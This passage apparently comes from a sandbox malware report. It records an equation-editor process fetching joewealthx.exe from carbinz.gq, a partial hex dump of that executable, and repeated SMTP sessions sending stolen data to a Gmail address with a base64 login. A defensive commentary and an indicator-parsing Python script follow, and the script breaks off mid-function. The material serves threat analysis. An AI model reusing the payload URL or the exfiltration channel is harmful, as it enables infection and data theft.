May 13, 2021 03:23:28.011239052 CEST | 8.8.8.8 | 192.168.2.22 | 0xca54 | No error (0) | mail.orienttech.com.qa | | 162.241.85.66 | A (IP address) | IN (0x0001)
May 13, 2021 03:23:28.063622952 CEST | 8.8.8.8 | 192.168.2.22 | 0xca54 | No error (0) | mail.orienttech.com.qa | | 162.241.85.66 | A (IP address) | IN (0x0001)
May 13, 2021 03:23:34.205548048 CEST | 8.8.8.8 | 192.168.2.22 | 0xf276 | No error (0) | mail.orienttech.com.qa | | 162.241.85.66 | A (IP address) | IN (0x0001)
May 13, 2021 03:23:34.266680002 CEST | 8.8.8.8 | 192.168.2.22 | 0xf276 | No error (0) | mail.orienttech.com.qa | | 162.241.85.66 | A (IP address) | IN (0x0001)
May 13, 2021 03:23:45.905827999 CEST | 8.8.8.8 | 192.168.2.22 | 0x7d69 | No error (0) | mail.orienttech.com.qa | | 162.241.85.66 | A (IP address) | IN (0x0001)
May 13, 2021 03:23:52.868915081 CEST | 8.8.8.8 | 192.168.2.22 | 0xe625 | No error (0) | mail.orienttech.com.qa | | 162.241.85.66 | A (IP address) | IN (0x0001)
May 13, 2021 03:23:52.926522970 CEST | 8.8.8.8 | 192.168.2.22 | 0xe625 | No error (0) | mail.orienttech.com.qa | | 162.241.85.66 | A (IP address) | IN (0x0001)
May 13, 2021 03:24:01.494138002 CEST | 8.8.8.8 | 192.168.2.22 | 0x7296 | No error (0) | mail.orienttech.com.qa | | 162.241.85.66 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• carbinz.gq

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 185.239.243.112 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
May 13, 2021 03:22:25.384917021 CEST | 0 | OUT | GET /modex/joewealthx.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: carbinz.gq
Connection: Keep-Alive
May 13, 2021 03:22:25.434566975 CEST | 2 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 May 2021 01:22:25 GMT
Content-Type: application/x-msdownload
Content-Length: 758272
Last-Modified: Wed, 12 May 2021 08:04:19 GMT
Connection: keep-alive
ETag: "609b8c03-b9200"
Accept-Ranges: bytes
                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8c 35 4c ea 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 88 0b 00 00 08 00 00 00 00 00 00 da a6 0b 00 00 20 00 00 00 c0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 a6 0b 00 4f 00 00 00 00 c0 0b 00 b4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0b 00 0c 00 00 00 6c a6 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e0 86 0b 00 00 20 00 00 00 88 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b4 05 00 00 00 c0 0b 00 00 06 00 00 00 8a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0b 00 00 02 00 00 00 90 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc a6 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 fc 65 00 00 d8 7e 00 00 03 00 00 00 76 00 00 06 d4 e4 00 00 98 c1 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 01 00 0b 00 00 00 01 00 00 11 00 72 01 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 01 00 00 11 00 72 11 00 00 70 0a 2b 00 06 2a 22 02 28 1f 00 00 0a 00 2a 
13 30 04 00 43 00 00 00 02 00 00 11 00 28 4c 00 00 06 26 12 01 fe 15 0b 00 00 02 12 01 0f 02 28 20 00 00 0a 68 7d c4 00 00 04 12 01 0f 02 28 21 00 00 0a 68 7d c5 00 00 04 07 0a 02 28 22 00 00 0a 20 a1 00 00 00 03 06 28 56 00 00 06 26 2a 3e 00 02 03 28 23 00 00 0a 28 04 00 00 06 00 2a 00 13 30 04 00 43 00 00 00 02 00 00 11 00 28 4c 00 00 06 26 12 01 fe 15 0b 00 00 02 12 01 0f 02 28 20 00 00 0a 68 7d c4 00 00 04 12 01 0f 02 28 21 00 00 0a 68 7d c5 00 00 04 07 0a 02 28 22 00 00 0a 20 a2 00 00 00 03 06 28 56 00 00 06 26 2a 3e 00 02 03 28 23 00 00 0a 28 06 00 00 06 00 2a 00 13 30 06 00 32 00 00 00 03 00 00 11 00 02 03 28 24 00 00 0a 00 02 28 25 00 00 0a 16 fe 01 0a 06 2c 1b 02 02 28 22 00 00 0a 16 16 02 28 26 00 00 0a 02 28 27 00 00 0a 28 0d 00 00 06 00 2a 3e 00 02 03 28 23 00 00 0a 28 0b 00 00 06 00 2a 00 00 13 30 03 00 0d 00 00 00 04 00 00 11 00 02 d1 03 1f 10 62 60 0a 2b 00 06 2a a6 00 02 28 22 00 00 0a 20 13 03 00 00 16 0f 02 28 20 00 00 0a 68 0f 02 28 21 00 00 0a 68 28 0a 00 00 06 28 51 00 00 06 26 2a 00 13 30 02 00 a3 00 00 00 05 00 00 11 00 02 28 25 00 00 0a 0a 06 2c 0e 00 02 03 28 28 00 00 0a 00 38 89 00 00 00 03 28 29 00 00 0a 0c 08 0b 07 1f 47 30 0e 07 1f 0c 2e 52 2b 00 07 1f 47 2e 56 2b 62 07 20 83 00 00 00 59 45 04 00 00 00 0c 00 00 00 46 00 00 00 17 00 00 00 22 00 00 00 2b 00 07 20 ae 00
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5L0 @ @Ol H.text `.rsrc@@.reloc@BHe~v0rp+*0rp+*"(*0C(L&( h}(!h}(" (V&*>(#(*0C(L&( h}(!h}(" (V&*>(#(*02($(%,("(&('(*>(#(*0b`+*(" ( h(!h((Q&*0(%,((8()G0.R+G.V+b YEF"+


SMTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
May 13, 2021 03:23:03.997697115 CEST | 587 | 49168 | 162.241.85.66 | 192.168.2.22 | 220-sh002.bigrock.com ESMTP Exim 4.94.2 #2 Thu, 13 May 2021 01:23:03 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
May 13, 2021 03:23:03.998275042 CEST | 49168 | 587 | 192.168.2.22 | 162.241.85.66 | EHLO 841675
May 13, 2021 03:23:04.158545017 CEST | 587 | 49168 | 162.241.85.66 | 192.168.2.22 | 250-sh002.bigrock.com Hello 841675 [84.17.52.78]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPE_CONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
May 13, 2021 03:23:04.160448074 CEST | 49168 | 587 | 192.168.2.22 | 162.241.85.66 | AUTH login c2FsZXNAb3JpZW50dGVjaC5jb20ucWE=
May 13, 2021 03:23:04.320734978 CEST | 587 | 49168 | 162.241.85.66 | 192.168.2.22 | 334 UGFzc3dvcmQ6
May 13, 2021 03:23:04.484436989 CEST | 587 | 49168 | 162.241.85.66 | 192.168.2.22 | 235 Authentication succeeded
May 13, 2021 03:23:04.499161959 CEST | 587 | 49168 | 162.241.85.66 | 192.168.2.22 | 421 sh002.bigrock.com lost input connection
May 13, 2021 03:23:10.083399057 CEST | 587 | 49169 | 162.241.85.66 | 192.168.2.22 | 220-sh002.bigrock.com ESMTP Exim 4.94.2 #2 Thu, 13 May 2021 01:23:10 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
May 13, 2021 03:23:10.085772991 CEST | 49169 | 587 | 192.168.2.22 | 162.241.85.66 | EHLO 841675
May 13, 2021 03:23:10.246397018 CEST | 587 | 49169 | 162.241.85.66 | 192.168.2.22 | 250-sh002.bigrock.com Hello 841675 [84.17.52.78]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPE_CONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
May 13, 2021 03:23:10.248018026 CEST | 49169 | 587 | 192.168.2.22 | 162.241.85.66 | AUTH login c2FsZXNAb3JpZW50dGVjaC5jb20ucWE=
May 13, 2021 03:23:10.408878088 CEST | 587 | 49169 | 162.241.85.66 | 192.168.2.22 | 334 UGFzc3dvcmQ6
May 13, 2021 03:23:10.571176052 CEST | 587 | 49169 | 162.241.85.66 | 192.168.2.22 | 235 Authentication succeeded
May 13, 2021 03:23:10.573822975 CEST | 49169 | 587 | 192.168.2.22 | 162.241.85.66 | MAIL FROM:<sales@orienttech.com.qa>
May 13, 2021 03:23:10.734144926 CEST | 587 | 49169 | 162.241.85.66 | 192.168.2.22 | 250 OK
May 13, 2021 03:23:10.734493971 CEST | 49169 | 587 | 192.168.2.22 | 162.241.85.66 | RCPT TO:<pdsctsops@gmail.com>
May 13, 2021 03:23:10.920496941 CEST | 587 | 49169 | 162.241.85.66 | 192.168.2.22 | 250 Accepted
May 13, 2021 03:23:10.920703888 CEST | 49169 | 587 | 192.168.2.22 | 162.241.85.66 | DATA
May 13, 2021 03:23:11.082185030 CEST | 587 | 49169 | 162.241.85.66 | 192.168.2.22 | 354 Enter message, ending with "." on a line by itself
May 13, 2021 03:23:18.615981102 CEST | 587 | 49170 | 162.241.85.66 | 192.168.2.22 | 220-sh002.bigrock.com ESMTP Exim 4.94.2 #2 Thu, 13 May 2021 01:23:18 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
May 13, 2021 03:23:18.617187023 CEST | 49170 | 587 | 192.168.2.22 | 162.241.85.66 | EHLO 841675
May 13, 2021 03:23:18.774024963 CEST | 587 | 49170 | 162.241.85.66 | 192.168.2.22 | 250-sh002.bigrock.com Hello 841675 [84.17.52.78]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPE_CONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
May 13, 2021 03:23:18.774563074 CEST | 49170 | 587 | 192.168.2.22 | 162.241.85.66 | AUTH login c2FsZXNAb3JpZW50dGVjaC5jb20ucWE=
May 13, 2021 03:23:18.931521893 CEST | 587 | 49170 | 162.241.85.66 | 192.168.2.22 | 334 UGFzc3dvcmQ6
May 13, 2021 03:23:19.090646029 CEST | 587 | 49170 | 162.241.85.66 | 192.168.2.22 | 235 Authentication succeeded
May 13, 2021 03:23:19.091041088 CEST | 49170 | 587 | 192.168.2.22 | 162.241.85.66 | MAIL FROM:<sales@orienttech.com.qa>
May 13, 2021 03:23:19.247781992 CEST | 587 | 49170 | 162.241.85.66 | 192.168.2.22 | 250 OK
May 13, 2021 03:23:19.248249054 CEST | 49170 | 587 | 192.168.2.22 | 162.241.85.66 | RCPT TO:<pdsctsops@gmail.com>
May 13, 2021 03:23:19.424469948 CEST | 587 | 49170 | 162.241.85.66 | 192.168.2.22 | 250 Accepted
May 13, 2021 03:23:19.424809933 CEST | 49170 | 587 | 192.168.2.22 | 162.241.85.66 | DATA
May 13, 2021 03:23:19.582461119 CEST | 587 | 49170 | 162.241.85.66 | 192.168.2.22 | 354 Enter message, ending with "." on a line by itself
May 13, 2021 03:23:20.571885109 CEST | 49170 | 587 | 192.168.2.22 | 162.241.85.66 | .
May 13, 2021 03:23:20.731383085 CEST | 587 | 49170 | 162.241.85.66 | 192.168.2.22 | 250 OK id=1lh04N-003kua-Gf
May 13, 2021 03:23:27.737900019 CEST | 49170 | 587 | 192.168.2.22 | 162.241.85.66 | QUIT
May 13, 2021 03:23:27.895456076 CEST | 587 | 49170 | 162.241.85.66 | 192.168.2.22 | 221 sh002.bigrock.com closing connection
May 13, 2021 03:23:28.547355890 CEST | 587 | 49171 | 162.241.85.66 | 192.168.2.22 | 220-sh002.bigrock.com ESMTP Exim 4.94.2 #2 Thu, 13 May 2021 01:23:28 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
May 13, 2021 03:23:28.547905922 CEST | 49171 | 587 | 192.168.2.22 | 162.241.85.66 | EHLO 841675
May 13, 2021 03:23:28.708467007 CEST | 587 | 49171 | 162.241.85.66 | 192.168.2.22 | 250-sh002.bigrock.com Hello 841675 [84.17.52.78]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPE_CONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
May 13, 2021 03:23:28.709213972 CEST | 49171 | 587 | 192.168.2.22 | 162.241.85.66 | AUTH login c2FsZXNAb3JpZW50dGVjaC5jb20ucWE=
May 13, 2021 03:23:28.870008945 CEST | 587 | 49171 | 162.241.85.66 | 192.168.2.22 | 334 UGFzc3dvcmQ6
May 13, 2021 03:23:29.033612013 CEST | 587 | 49171 | 162.241.85.66 | 192.168.2.22 | 235 Authentication succeeded
May 13, 2021 03:23:29.034157991 CEST | 49171 | 587 | 192.168.2.22 | 162.241.85.66 | MAIL FROM:<sales@orienttech.com.qa>
May 13, 2021 03:23:29.194521904 CEST | 587 | 49171 | 162.241.85.66 | 192.168.2.22 | 250 OK
May 13, 2021 03:23:29.194818974 CEST | 49171 | 587 | 192.168.2.22 | 162.241.85.66 | RCPT TO:<pdsctsops@gmail.com>
May 13, 2021 03:23:29.377938032 CEST | 587 | 49171 | 162.241.85.66 | 192.168.2.22 | 250 Accepted
May 13, 2021 03:23:29.378381968 CEST | 49171 | 587 | 192.168.2.22 | 162.241.85.66 | DATA
May 13, 2021 03:23:29.538724899 CEST | 587 | 49171 | 162.241.85.66 | 192.168.2.22 | 354 Enter message, ending with "." on a line by itself
May 13, 2021 03:23:30.554898977 CEST | 587 | 49171 | 162.241.85.66 | 192.168.2.22 | 250 OK id=1lh04X-003l25-FA
May 13, 2021 03:23:34.591773987 CEST | 587 | 49172 | 162.241.85.66 | 192.168.2.22 | 220-sh002.bigrock.com ESMTP Exim 4.94.2 #2 Thu, 13 May 2021 01:23:34 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
May 13, 2021 03:23:34.592497110 CEST | 49172 | 587 | 192.168.2.22 | 162.241.85.66 | EHLO 841675
May 13, 2021 03:23:34.752564907 CEST | 587 | 49172 | 162.241.85.66 | 192.168.2.22 | 250-sh002.bigrock.com Hello 841675 [84.17.52.78]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPE_CONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
May 13, 2021 03:23:34.753225088 CEST | 49172 | 587 | 192.168.2.22 | 162.241.85.66 | AUTH login c2FsZXNAb3JpZW50dGVjaC5jb20ucWE=
May 13, 2021 03:23:34.913440943 CEST | 587 | 49172 | 162.241.85.66 | 192.168.2.22 | 334 UGFzc3dvcmQ6
May 13, 2021 03:23:35.075247049 CEST | 587 | 49172 | 162.241.85.66 | 192.168.2.22 | 235 Authentication succeeded
May 13, 2021 03:23:35.076103926 CEST | 49172 | 587 | 192.168.2.22 | 162.241.85.66 | MAIL FROM:<sales@orienttech.com.qa>
May 13, 2021 03:23:35.235919952 CEST | 587 | 49172 | 162.241.85.66 | 192.168.2.22 | 250 OK
May 13, 2021 03:23:35.236738920 CEST | 49172 | 587 | 192.168.2.22 | 162.241.85.66 | RCPT TO:<pdsctsops@gmail.com>
May 13, 2021 03:23:35.414937973 CEST | 587 | 49172 | 162.241.85.66 | 192.168.2.22 | 250 Accepted
May 13, 2021 03:23:35.415452003 CEST | 49172 | 587 | 192.168.2.22 | 162.241.85.66 | DATA
May 13, 2021 03:23:35.575618029 CEST | 587 | 49172 | 162.241.85.66 | 192.168.2.22 | 354 Enter message, ending with "." on a line by itself
May 13, 2021 03:23:36.588289976 CEST | 49172 | 587 | 192.168.2.22 | 162.241.85.66 | .
May 13, 2021 03:23:36.751983881 CEST | 587 | 49172 | 162.241.85.66 | 192.168.2.22 | 250 OK id=1lh04d-003l62-GN
May 13, 2021 03:23:46.254163980 CEST | 587 | 49173 | 162.241.85.66 | 192.168.2.22 | 220-sh002.bigrock.com ESMTP Exim 4.94.2 #2 Thu, 13 May 2021 01:23:46 +0000
220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            May 13, 2021 03:23:46.254576921 CEST49173587192.168.2.22162.241.85.66EHLO 841675
                                            May 13, 2021 03:23:46.412447929 CEST58749173162.241.85.66192.168.2.22250-sh002.bigrock.com Hello 841675 [84.17.52.78]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPE_CONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            May 13, 2021 03:23:46.413131952 CEST49173587192.168.2.22162.241.85.66AUTH login c2FsZXNAb3JpZW50dGVjaC5jb20ucWE=
                                            May 13, 2021 03:23:46.572596073 CEST58749173162.241.85.66192.168.2.22334 UGFzc3dvcmQ6
                                            May 13, 2021 03:23:46.732511044 CEST58749173162.241.85.66192.168.2.22235 Authentication succeeded
                                            May 13, 2021 03:23:46.735352993 CEST49173587192.168.2.22162.241.85.66MAIL FROM:<sales@orienttech.com.qa>
                                            May 13, 2021 03:23:46.891623020 CEST58749173162.241.85.66192.168.2.22250 OK
                                            May 13, 2021 03:23:46.892031908 CEST49173587192.168.2.22162.241.85.66RCPT TO:<pdsctsops@gmail.com>
                                            May 13, 2021 03:23:47.073494911 CEST58749173162.241.85.66192.168.2.22250 Accepted
                                            May 13, 2021 03:23:47.073843956 CEST49173587192.168.2.22162.241.85.66DATA
                                            May 13, 2021 03:23:47.231632948 CEST58749173162.241.85.66192.168.2.22354 Enter message, ending with "." on a line by itself
                                            May 13, 2021 03:23:47.272505045 CEST58749173162.241.85.66192.168.2.22421 Lost incoming connection
                                            May 13, 2021 03:23:53.245213985 CEST58749174162.241.85.66192.168.2.22220-sh002.bigrock.com ESMTP Exim 4.94.2 #2 Thu, 13 May 2021 01:23:53 +0000
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            May 13, 2021 03:23:53.245516062 CEST49174587192.168.2.22162.241.85.66EHLO 841675
                                            May 13, 2021 03:23:53.402441978 CEST58749174162.241.85.66192.168.2.22250-sh002.bigrock.com Hello 841675 [84.17.52.78]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPE_CONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            May 13, 2021 03:23:53.402909040 CEST49174587192.168.2.22162.241.85.66AUTH login c2FsZXNAb3JpZW50dGVjaC5jb20ucWE=
                                            May 13, 2021 03:23:53.559551954 CEST58749174162.241.85.66192.168.2.22334 UGFzc3dvcmQ6
                                            May 13, 2021 03:23:53.717236996 CEST58749174162.241.85.66192.168.2.22235 Authentication succeeded
                                            May 13, 2021 03:23:53.717570066 CEST49174587192.168.2.22162.241.85.66MAIL FROM:<sales@orienttech.com.qa>
                                            May 13, 2021 03:23:53.873570919 CEST58749174162.241.85.66192.168.2.22250 OK
                                            May 13, 2021 03:23:53.874008894 CEST49174587192.168.2.22162.241.85.66RCPT TO:<pdsctsops@gmail.com>
                                            May 13, 2021 03:23:54.054264069 CEST58749174162.241.85.66192.168.2.22250 Accepted
                                            May 13, 2021 03:23:54.054610014 CEST49174587192.168.2.22162.241.85.66DATA
                                            May 13, 2021 03:23:54.210964918 CEST58749174162.241.85.66192.168.2.22354 Enter message, ending with "." on a line by itself
                                            May 13, 2021 03:23:55.206312895 CEST49174587192.168.2.22162.241.85.66.
                                            May 13, 2021 03:23:55.365861893 CEST58749174162.241.85.66192.168.2.22250 OK id=1lh04w-003lMD-4j
                                            May 13, 2021 03:24:01.208173037 CEST49174587192.168.2.22162.241.85.66QUIT
                                            May 13, 2021 03:24:01.367203951 CEST58749174162.241.85.66192.168.2.22221 sh002.bigrock.com closing connection
                                            May 13, 2021 03:24:04.110459089 CEST58749175162.241.85.66192.168.2.22220-sh002.bigrock.com ESMTP Exim 4.94.2 #2 Thu, 13 May 2021 01:24:04 +0000
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            May 13, 2021 03:24:04.110891104 CEST49175587192.168.2.22162.241.85.66EHLO 841675
                                            May 13, 2021 03:24:04.272001982 CEST58749175162.241.85.66192.168.2.22250-sh002.bigrock.com Hello 841675 [84.17.52.78]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPE_CONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            May 13, 2021 03:24:04.272419930 CEST49175587192.168.2.22162.241.85.66AUTH login c2FsZXNAb3JpZW50dGVjaC5jb20ucWE=
                                            May 13, 2021 03:24:04.437010050 CEST58749175162.241.85.66192.168.2.22334 UGFzc3dvcmQ6
                                            May 13, 2021 03:24:04.599860907 CEST58749175162.241.85.66192.168.2.22235 Authentication succeeded
                                            May 13, 2021 03:24:04.600142002 CEST49175587192.168.2.22162.241.85.66MAIL FROM:<sales@orienttech.com.qa>
                                            May 13, 2021 03:24:04.760809898 CEST58749175162.241.85.66192.168.2.22250 OK
                                            May 13, 2021 03:24:04.761053085 CEST49175587192.168.2.22162.241.85.66RCPT TO:<pdsctsops@gmail.com>
                                            May 13, 2021 03:24:04.940522909 CEST58749175162.241.85.66192.168.2.22250 Accepted
                                            May 13, 2021 03:24:04.940841913 CEST49175587192.168.2.22162.241.85.66DATA
                                            May 13, 2021 03:24:05.103980064 CEST58749175162.241.85.66192.168.2.22354 Enter message, ending with "." on a line by itself
                                            May 13, 2021 03:24:08.884320021 CEST58749176162.241.85.66192.168.2.22220-sh002.bigrock.com ESMTP Exim 4.94.2 #2 Thu, 13 May 2021 01:24:08 +0000
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            May 13, 2021 03:24:08.884543896 CEST49176587192.168.2.22162.241.85.66EHLO 841675
                                            May 13, 2021 03:24:09.040916920 CEST58749176162.241.85.66192.168.2.22250-sh002.bigrock.com Hello 841675 [84.17.52.78]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPE_CONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            May 13, 2021 03:24:09.041120052 CEST49176587192.168.2.22162.241.85.66AUTH login c2FsZXNAb3JpZW50dGVjaC5jb20ucWE=
                                            May 13, 2021 03:24:09.197319984 CEST58749176162.241.85.66192.168.2.22334 UGFzc3dvcmQ6
                                            May 13, 2021 03:24:09.354722023 CEST58749176162.241.85.66192.168.2.22235 Authentication succeeded
                                            May 13, 2021 03:24:09.354909897 CEST49176587192.168.2.22162.241.85.66MAIL FROM:<sales@orienttech.com.qa>
                                            May 13, 2021 03:24:09.510795116 CEST58749176162.241.85.66192.168.2.22250 OK
                                            May 13, 2021 03:24:09.511375904 CEST49176587192.168.2.22162.241.85.66RCPT TO:<pdsctsops@gmail.com>
                                            May 13, 2021 03:24:10.016205072 CEST49176587192.168.2.22162.241.85.66RCPT TO:<pdsctsops@gmail.com>
                                            May 13, 2021 03:24:10.086047888 CEST58749176162.241.85.66192.168.2.22250 Accepted
                                            May 13, 2021 03:24:10.086345911 CEST49176587192.168.2.22162.241.85.66DATA
                                            May 13, 2021 03:24:10.242222071 CEST58749176162.241.85.66192.168.2.22354 Enter message, ending with "." on a line by itself
                                            May 13, 2021 03:24:12.469890118 CEST49176587192.168.2.22162.241.85.66.
                                            May 13, 2021 03:24:12.628506899 CEST58749176162.241.85.66192.168.2.22250 OK id=1lh05C-003leg-5k
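The exchange above is the sample's SMTP exfiltration channel. The client authenticates with AUTH LOGIN on port 587 and never sends STARTTLS, although every EHLO reply advertises it, so the account name travels as plain base64 (c2FsZXNAb3JpZW50dGVjaC5jb20ucWE= decodes to sales@orienttech.com.qa) and the server's 334 prompt UGFzc3dvcmQ6 is "Password:". The capture does not show the client's reply to that prompt, but on a session without STARTTLS that reply is base64 as well, so a full pcap would yield the credential. Four messages to pdsctsops@gmail.com were accepted (ids 1lh04X-003l25-FA, 1lh04d-003l62-GN, 1lh04w-003lMD-4j and 1lh05C-003leg-5k); session 49173 was dropped by the server with 421. The script below is an added example, not part of the Joe Sandbox report: it parses rows in the fused layout the report uses, decodes the AUTH LOGIN token and pulls per-session indicators. It assumes the analyst knows the analysis VM address (192.168.2.22) and the server port (587), both visible in the report; SAMPLE is a constructed, abridged copy of session 49174.

```python
"""Pull SMTP exfiltration indicators out of the fused network rows of a Joe
Sandbox report (the layout of the table above).  Added example for this page,
not Joe Sandbox code.  Assumed known to the analyst: the analysis VM address and
the mail server port, both read off this report.  SAMPLE is a constructed,
abridged copy of session 49174 from the capture above."""
import base64
import re
from collections import defaultdict

HOST_IP = "192.168.2.22"   # analysis VM (assumed known)
SERVER_PORT = "587"        # submission port the sample used

# A row runs timestamp, src port, dst port, src IP, dst IP and the SMTP line
# together with no separator; anchoring on the known port and host address is
# what lets the regex split the digit run without guessing.
OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
IPV4 = OCTET + r"(?:\." + OCTET + r"){3}"
TS = r"(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+ [A-Z]{3,4})"
PORTS = r"(?:" + SERVER_PORT + r"(?P<s2c>\d{1,5})|(?P<c2s>\d{1,5})" + SERVER_PORT + ")"
ADDRS = (r"(?:" + re.escape(HOST_IP) + r"(?P<rem_a>" + IPV4 + ")|(?P<rem_b>" + IPV4 + ")"
         + re.escape(HOST_IP) + ")")
DATA = r"(?P<data>(?:\d{3}[ -]|[A-Z]{4}\b|\.).*)"  # reply code, verb, or end-of-data dot
ROW = re.compile("^" + TS + PORTS + ADDRS + DATA + "$")

SAMPLE = """\
May 13, 2021 03:23:53.245213985 CEST58749174162.241.85.66192.168.2.22220-sh002.bigrock.com ESMTP Exim 4.94.2 #2 Thu, 13 May 2021 01:23:53 +0000
May 13, 2021 03:23:53.245516062 CEST49174587192.168.2.22162.241.85.66EHLO 841675
May 13, 2021 03:23:53.402441978 CEST58749174162.241.85.66192.168.2.22250-sh002.bigrock.com Hello 841675 [84.17.52.78]
250-AUTH PLAIN LOGIN
250-STARTTLS
May 13, 2021 03:23:53.402909040 CEST49174587192.168.2.22162.241.85.66AUTH login c2FsZXNAb3JpZW50dGVjaC5jb20ucWE=
May 13, 2021 03:23:53.559551954 CEST58749174162.241.85.66192.168.2.22334 UGFzc3dvcmQ6
May 13, 2021 03:23:53.717570066 CEST49174587192.168.2.22162.241.85.66MAIL FROM:<sales@orienttech.com.qa>
May 13, 2021 03:23:53.874008894 CEST49174587192.168.2.22162.241.85.66RCPT TO:<pdsctsops@gmail.com>
May 13, 2021 03:23:55.206312895 CEST49174587192.168.2.22162.241.85.66.
May 13, 2021 03:23:55.365861893 CEST58749174162.241.85.66192.168.2.22250 OK id=1lh04w-003lMD-4j
"""

def parse_rows(text):
    """One dict per SMTP line; reply continuations (220-/250-) fold into the row above."""
    rows = []
    for line in filter(None, map(str.strip, text.splitlines())):
        m = ROW.match(line)
        if m is None:
            if rows:
                rows[-1]["data"] += "\n" + line
            continue
        rows.append({"ts": m["ts"], "client_port": m["s2c"] or m["c2s"],
                     "dir": "S>C" if m["s2c"] else "C>S",
                     "remote": m["rem_a"] or m["rem_b"], "data": m["data"]})
    return rows

def b64_text(token):
    """Decode a base64 token to text, or None if it is not valid base64."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except ValueError:
        return None

def summarize(rows):
    """Per client port: account used, envelope, accepted message IDs, TLS posture."""
    new = lambda: {"remote": None, "server": None, "user": None, "prompt": None,
                   "mail_from": set(), "rcpt_to": set(), "accepted": [],
                   "starttls_offered": False, "starttls_used": False}
    sessions = defaultdict(new)
    for r in rows:
        s, d = sessions[r["client_port"]], r["data"]
        s["remote"] = r["remote"]
        if r["dir"] == "S>C":
            banner = re.match(r"220[ -](\S+)", d)
            queued = re.match(r"250 OK id=(\S+)", d)      # one per delivered message
            if banner:
                s["server"] = banner.group(1)
            if queued:
                s["accepted"].append(queued.group(1))
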